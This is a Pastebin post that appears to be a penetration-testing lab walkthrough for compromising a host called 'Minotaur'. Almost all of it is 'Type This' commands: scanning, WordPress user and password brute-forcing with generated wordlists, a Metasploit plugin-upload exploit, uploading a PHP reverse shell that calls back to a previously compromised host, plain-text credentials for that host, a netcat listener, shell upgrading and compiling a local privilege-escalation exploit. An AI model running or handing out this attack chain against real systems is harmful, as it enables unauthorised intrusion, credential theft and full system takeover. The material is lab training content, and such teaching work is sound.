Advertisement
joemccray

Attacking 117

Apr 26th, 2018
978
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.63 KB | None | 0 0
  1. ######################
  2. # Attacking Minotaur #
  3. ######################
  4.  
  5. Step 1: Portscan/Bannergrab the target host
  6. ---------------------------Type This-----------------------------------
  7. sudo nmap -sV 172.31.2.117
  8. -----------------------------------------------------------------------
  9.  
  10.  
  11.  
  12. Step 2: Vulnerability scan the web server
  13. ---------------------------Type This-----------------------------------
  14. nikto.pl -h 172.31.2.117
  15. -----------------------------------------------------------------------
  16.  
  17.  
  18.  
  19. Step 3: Directory brute-force the webserver
  20. ---------------------------Type This-----------------------------------
  21. dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
  22. -----------------------------------------------------------------------
  23.  
  24. ### dirb output ###
  25. ==> DIRECTORY: http://172.31.2.117/bull/
  26. -----------------------------------------------------------------------
  27.  
  28.  
  29. Step 4: Run wordpress vulnerability scanner
  30. ---------------------------Type This-----------------------------------
  31. wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
  32.  
  33.  
  34. cewl -w words.txt http://172.31.2.117/bull/
  35.  
  36.  
  37. cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
  38.  
  39. wc -l whateverbro.txt
  40.  
  41. john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
  42.  
  43. wc -l words-john.txt
  44.  
  45. wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
  46. -----------------------------------------------------------------------
  47.  
  48.  
  49.  
  50.  
  51.  
  52. Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
  53. ---------------------------Type This-----------------------------------
  54. msfconsole
  55.  
  56. use exploit/unix/webapp/wp_slideshowgallery_upload
  57.  
  58. set RHOST 172.31.2.117
  59.  
  60. set RPORT 80
  61.  
  62. set TARGETURI /bull
  63.  
  64. set WP_USER bully
  65.  
  66. set WP_PASSWORD Bighornedbulls
  67.  
  68. exploit
  69. -----------------------------------------------------------------------
  70.  
  71. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  72. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  73. and then from the lab network attacking other students.
  74.  
  75.  
  76. ---------------------------Type This-----------------------------------
  77. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  78.  
  79. tar -zxvf php-reverse-shell-1.0.tar.gz
  80.  
  81. cd ~/toolz/php-reverse-shell-1.0/
  82.  
  83. nano php-reverse-shell.php
  84. -----------------------------------------------------------------------
  85. ***** change the $ip and $port variables to a host that you have already compromised in the network
  86. ***** for this example I chose 172.31.2.64 and kept port 1234
  87.  
  88.  
  89. ---------------------------Type This-----------------------------------
  90. chmod 777 php-reverse-shell.php
  91. cp php-reverse-shell.php ..
  92. -----------------------------------------------------------------------
  93.  
  94.  
  95.  
  96. Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
  97. Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
  98. --------------------------Type This-----------------------------------
  99. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  100.  
  101. -----------------------------------------------------------------------
  102.  
  103.  
  104.  
  105. Set up netcat listener on previously compromised host
  106. ---------------------------Type This-----------------------------------
  107. ssh -l webmin 172.31.2.64
  108. webmin1980
  109.  
  110.  
  111. nc -lvp 1234
  112. -----------------------------------------------------------------------
  113.  
  114.  
  115.  
  116.  
  117. ---------------------Type This in your browser ------------------------
  118. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  119. -----------------------------------------------------------------------
  120.  
  121.  
  122. Now check your listener to see if you got the connection
  123. ---------------------------Type This-----------------------------------
  124. id
  125.  
  126. /sbin/ifconfig
  127.  
  128. python -c 'import pty;pty.spawn("/bin/bash")'
  129.  
  130. ---------------------------Type This-----------------------------------
  131. cd /tmp
  132. cat >> exploit2.c << out
  133. -----------------------------------------------------------------------
  134. **************paste in the content from here *****************
  135. https://www.exploit-db.com/raw/37292/
  136.  
  137. **************hit enter a few times *****************
  138.  
  139. ---------------------------Type This-----------------------------------
  140. out
  141.  
  142.  
  143. gcc -o boom2 exploit2.c
  144.  
  145. ./boom2
  146.  
  147. id
  148. -----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement